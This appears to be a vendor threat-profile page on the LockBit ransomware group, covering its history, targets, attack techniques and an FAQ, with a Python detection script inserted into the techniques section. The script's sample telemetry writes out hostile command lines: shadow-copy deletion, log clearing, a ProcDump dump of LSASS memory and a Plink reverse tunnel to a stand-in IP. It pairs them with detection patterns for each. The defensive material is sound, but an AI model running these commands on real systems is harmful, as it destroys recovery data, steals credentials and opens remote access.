Lockbit
LockBit, whose best-known variant is LockBit 3.0 (also called LockBit Black), is one of the largest ransomware operations in the world. It has carried out extensive attacks across many industries, impacting thousands of organizations globally with persistent and adaptive tactics.

The Origin of Lockbit
LockBit traces its origins back to September 2019, when the first known activity of the "ABCD" ransomware, widely regarded as LockBit's predecessor, was observed. By January 2020, LockBit had begun appearing under its current name on Russian-language cybercrime forums. From that initial foothold it rapidly became one of the most prominent ransomware families, adopting a Ransomware-as-a-Service (RaaS) model that includes a dedicated leak site (DLS) and a ransom negotiation portal. Affiliates sign on to use LockBit's ransomware builders, manage new victims via the DLS, and may also employ "StealBit," a data-exfiltration tool bundled with later LockBit versions.
A significant milestone arrived in June 2021 with the debut of LockBit 2.0 (often referred to as LockBit Red). While LockBit's popularity and impact were already growing, this release dramatically expanded the group's visibility. In October 2021, LockBit Linux-ESXi Locker version 1.0 appeared, broadening LockBit's targeting to Linux and VMware ESXi systems. The operators continued evolving their product in March 2022 with the emergence of LockBit 3.0, also called LockBit Black, a new variant sharing code with BlackMatter and Alphv (BlackCat) ransomware. Although its first appearance was reported in March 2022, many point to June 2022 as the effective launch date, when LockBit 3.0 became widely adopted. LockBit Red (the rebranded LockBit 2.0) remained the default builder for most affiliates, while LockBit Black was reserved for affiliates who had demanded over USD 2.5 million in ransoms. This version also introduced configurable behaviour, such as a list of processes and services to kill and lists of files, folders and devices to exclude from encryption, and came with a bug bounty program offering rewards of up to USD 10 million.
In September 2022, a leak of the LockBit 3.0 builder enabled non-LockBit affiliates to generate LockBit payloads, accelerating its spread. The ransomware’s next iteration, LockBit Green, was unveiled in January 2023, reportedly incorporating leaked Conti version 3 source code. Unlike LockBit Black, LockBit Green required no proof of large ransom demands, making it a more inclusive offering for a broader array of cybercriminal operators. Four months later, in April 2023, a new LockBit macOS variant surfaced on open-source malware repositories, largely mirroring the functionality of LockBit’s Linux/ESXi version and underscoring the group’s continued push to infect as many platforms as possible.
Law enforcement pressure against LockBit intensified in February 2024 when “Operation Cronos”—a coordinated multinational effort—resulted in the temporary seizure of its DLS and affiliate portal. Although LockBit services were restored five days later, further action in May 2024 led to indictments and sanctions targeting several of the group’s key members, including a Russian national identified as a principal developer and administrator. In December 2024, LockBit countered these setbacks by releasing LockBit 4.0, which notably removed the option to generate LockBit Red payloads. Despite ongoing disruptions, LockBit has maintained its position as a formidable ransomware force by regularly updating its offerings and continuing to attract affiliates through its RaaS framework.
Sources: CISA & CrowdStrike

Countries targeted by Lockbit
Despite LockBit's assertions of political neutrality, a substantial share of its victims are in NATO member states and allied countries.
Approximately 50% of attacks involving the LockBit 3.0 strain have hit organizations in the United States. According to CISA, since January 2020 LockBit affiliates have received more than USD 91 million in ransom payments from U.S. victims alone.
Brazil and India are also heavily targeted.

Industries Targeted by Lockbit
Manufacturing is the sector LockBit hits most often, yet no single industry is consistently singled out, underscoring the group's opportunistic targeting.
While it typically preys on small and medium-sized businesses, even large firms such as the IT services giant Accenture have been hit by LockBit.
Source: SOCRadar
Lockbit's Victims
Lockbit’s Attack Method

LockBit 3.0 affiliates gain initial access to networks by:
- abusing valid credentials from compromised accounts
- exploiting exposed Remote Desktop Protocol (RDP) services
- exploiting vulnerabilities in public-facing applications
- drive-by compromise, when a user visits a compromised or malicious website during normal browsing
- phishing

When the privileges it holds are insufficient, LockBit 3.0 attempts to escalate them (CISA reports a User Account Control bypass), and it enables automatic logon, which serves both privilege escalation and persistence.

LockBit 3.0 evades defenses by encrypting the host and bot information it sends to its command-and-control servers and by deleting itself from disk after execution. The payload is also password-gated: it decrypts and runs its main component only when the correct password is supplied on the command line, which frustrates sandbox analysis of a sample captured without that password.
To persist in a network, LockBit 3.0 uses the compromised user accounts it holds and configures systems for automatic logon.

LockBit 3.0 uses ProcDump from Microsoft Sysinternals to dump the memory of the LSASS.exe process, from which credentials can then be extracted.

LockBit 3.0 scans networks with SoftPerfect Network Scanner, collects system and domain information, and checks the system and user-interface language, skipping hosts whose language settings match a hard-coded exclusion list (CISA notes the list includes languages associated with CIS countries).

For lateral movement within a network, LockBit 3.0 uses Splashtop remote-desktop software.


For command and control, LockBit 3.0 uses FileZilla and automates SSH sessions with Plink on Windows. For execution it runs commands through the Windows command-line interpreter and uses Chocolatey, a Windows package manager, to install tooling.

For exfiltration, LockBit 3.0 uses its bespoke tool StealBit along with rclone and public cloud file-sharing services such as MEGA.

In the impact phase, LockBit 3.0 deletes logs and empties the recycle bin, encrypts data, stops processes and services, deletes volume shadow copies to inhibit recovery, and replaces the infected system's wallpaper and icons with its own imagery.
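The behaviours above are what a defender actually has to look for in endpoint telemetry. The following is an added example, not code from the page, from CISA or from Vectra: a small Python pass that maps Sysmon-style process-creation and registry events to five of the LockBit 3.0 behaviours described in this section (shadow copy deletion, event log clearing, ProcDump against LSASS, Plink SSH tunnelling, and automatic-logon configuration under the Winlogon key). The event schema, its field names, the file paths and every sample command line are constructed for illustration; adapt the parsing to your own Sysmon or EDR schema.

```python
"""Map Sysmon-style endpoint events to the LockBit 3.0 behaviours described above.

Added example for illustration; not code from the page, from CISA or from Vectra.
The event schema (type/image/cmdline/target/details) and every sample record below
are constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass

# Constructed sample events. "process" mimics Sysmon Event ID 1 (process create),
# "registry" mimics Sysmon Event ID 13 (registry value set).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"type": "process", "image": r"C:\Temp\procdump64.exe",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe C:\\Temp\\lsass.dmp"},
    {"type": "registry",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon",
     "details": "1"},
    {"type": "process", "image": r"C:\Tools\plink.exe",
     "cmdline": "plink.exe -ssh -pw REDACTED -R 3389:127.0.0.1:3389 user@203.0.113.10"},
    # Benign control record: an ordinary service-host launch that must not fire.
    {"type": "process", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]


@dataclass(frozen=True)
class Rule:
    name: str        # short description of the behaviour
    tactic: str      # ATT&CK tactic and technique the behaviour corresponds to
    event_type: str  # which event type the pattern is applied to
    pattern: re.Pattern


# One rule per behaviour named in the Attack Method section.
RULES = [
    Rule("Volume shadow copies deleted", "Impact: Inhibit System Recovery (T1490)", "process",
         re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("Windows event log cleared", "Defense Evasion: Indicator Removal (T1070.001)", "process",
         re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    Rule("LSASS memory dumped with ProcDump", "Credential Access: LSASS Memory (T1003.001)", "process",
         re.compile(r"\bprocdump(64)?(\.exe)?\b.*\blsass(\.exe)?\b", re.I)),
    Rule("Plink SSH session or tunnel", "Command and Control: Protocol Tunneling (T1572)", "process",
         re.compile(r"\bplink(\.exe)?\b.*\s-(ssh|pw|R|L|D)\b", re.I)),
    Rule("Automatic logon configured", "Persistence: Boot or Logon Autostart Execution (T1547)", "registry",
         re.compile(r"\\Winlogon\\(AutoAdminLogon|DefaultPassword)$", re.I)),
]


@dataclass(frozen=True)
class Hit:
    rule: str
    tactic: str
    evidence: str


def evaluate(events):
    """Return one Hit per (event, rule) match; events matching nothing yield no Hit."""
    hits = []
    for ev in events:
        # Process rules inspect the full command line; registry rules inspect the target path.
        text = ev["cmdline"] if ev["type"] == "process" else ev["target"]
        for rule in RULES:
            if rule.event_type == ev["type"] and rule.pattern.search(text):
                hits.append(Hit(rule.name, rule.tactic, text))
    return hits


def triage(events):
    """Summarise which attack phases from the section are present in the telemetry."""
    return sorted({h.tactic.split(":")[0] for h in evaluate(events)})


if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"[{h.tactic}] {h.rule}: {h.evidence}")
    print("Phases observed:", ", ".join(triage(SAMPLE_EVENTS)))
```

Seeing several of these phases on one host within a short window is a much stronger signal than any single rule: ProcDump against LSASS has legitimate administrative uses, and shadow-copy deletion appears in some backup workflows, but the combination with log clearing and an automatic-logon change is the sequence the section describes. Pattern matching on command lines is also easy to evade with renamed binaries or alternative tooling, so treat this as a starting point rather than a complete detection.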

TTPs used by Lockbit
How to Detect Lockbit with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack.
FAQs
What is LockBit ransomware?
LockBit is a Ransomware-as-a-Service (RaaS) that encrypts an organization's data and demands a ransom for the decryption key. It's known for its stealth, speed, and the use of a double extortion scheme.
How does LockBit gain initial access to networks?
LockBit affiliates gain initial access through several means, including exploiting exposed Remote Desktop Protocol (RDP) services, phishing and spear-phishing, exploiting vulnerable public-facing applications, and using credentials from previously breached accounts.
What makes LockBit 3.0 different from its previous versions?
LockBit 3.0 is more modular and evasive, with improved encryption and the ability to customize the attack payload. It has incorporated features from other ransomware like BlackMatter and BlackCat.
Has LockBit been involved in any significant cyber incidents?
Yes, LockBit has been responsible for numerous attacks on businesses globally, including high-profile incidents involving large multinational corporations.
What sectors does LockBit typically target?
LockBit does not target a specific sector. It has been known to target a wide range of industries, including healthcare, education, and manufacturing.
How does LockBit handle the ransom process?
LockBit drops a ransom note with payment instructions on each encrypted host. Payment is demanded in cryptocurrency, and negotiations are conducted through the group's Tor-based negotiation portal.
What defensive measures can be effective against LockBit?
Regularly updating and patching systems, implementing robust access controls, conducting frequent security awareness training, using advanced threat detection tools, and maintaining offline backups are critical defenses.
Are there decryption tools available for LockBit encrypted files?
Partly. When law enforcement seized LockBit's infrastructure in Operation Cronos (February 2024), the UK National Crime Agency (NCA) obtained more than 1,000 decryption keys, and the FBI has since said it holds keys for thousands more victims. Keys exist only for a subset of victims, and they recover encrypted files, not data the group stole for extortion. If you have been impacted, contact the NCA, the FBI or your national law enforcement agency to check whether a key is available for your infection.
What is the best course of action if my network is compromised by LockBit?
Isolate the affected systems, initiate an incident response plan, and contact law enforcement and cybersecurity professionals. Avoid paying the ransom, as it does not guarantee data recovery and may fund further criminal activity.
What is known about the operators behind LockBit?
The operators are believed to be a part of a sophisticated cybercriminal group that operates with a RaaS model, recruiting affiliates to spread the ransomware while remaining hidden and maintaining anonymity.